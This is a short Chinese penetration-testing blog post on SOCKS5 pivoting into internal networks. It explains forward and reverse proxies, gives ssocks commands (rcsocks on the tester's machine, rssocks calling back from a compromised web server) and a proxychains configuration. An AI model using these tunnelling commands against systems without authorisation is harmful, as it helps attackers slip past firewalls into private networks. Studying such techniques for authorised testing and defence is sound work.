内网渗透之socks5代理总结

内网socks5代理我总结了一下,一共分linux和windows两种方式,其实除了用到的工具不一样,一个图形工具,一个命令行,其他大同小异

在总结代理之前还是再梳理一下正向代理和反向代理的区别

1.1 正向代理(Forward Proxy)

Lhost--》proxy--》Rhost 

Lhost为了访问到Rhost,向proxy发送了一个请求并且指定目标是Rhost,然后proxy向Rhost转交请求并将获得的内容返回给Lhost,简单来说正向代理就是proxy代替了我们去访问Rhost。

1.2 反向代理(reverse proxy)

Lhost<--->proxy<--->firewall<--->Rhost 

和正向代理相反(废话),Lhost只向proxy发送普通的请求,具体让他转到哪里,proxy自己判断,然后将返回的数据递交回来,这样的好处就是在某些防火墙只允许proxy数据进出的时候可以有效的进行穿透

1.3 简单区分

正向代理是我们自己(Lhost)主动(proxy)进攻,反向代理是她(Rhost)主动通过 (proxy)找我(Lhost)

windows环境下:---reGeorg+proxifier 正向代理

linux环境下:   ---socks代理

在http://sourceforge.net/projects/ssocks/  下载对应的linux安装包

然后安装完成

1)本地监听端口
在渗透测试端执行

./rcsocks -l 1088 -p 1080 -vv

等待远程Socks5服务器访问本地1080端口,创建端口1080与本地端口1088的连接通道

2)开启Socks5代理服务,反弹
在web服务器上执行

./rssocks -vv -s 渗透测试机ip:1080

启用Socks5服务,反弹到渗透测试机的端口1080上

 3)利用proxychains进行Socks5代理

proxychains是一个代理客户端软件,可以支持几乎所有程序的代理,如ssh,telnet,ftp等。利用proxychains,程序能在代理的环境下被加载运行,而本身不需要具备代理功能。使用前需要对proxychains进行简单配置,打开配置文件proxychains.conf(在Kali位于/etc/proxychains.conf),在末尾[ProxyList]处添加
socks5 127.0.0.1 1088

 配置成功后若要启动程序,仅需要在启动程序命令前加上proxychains即可通过代理访问内网服务。

原文地址:https://www.cnblogs.com/cn-36/p/6748291.html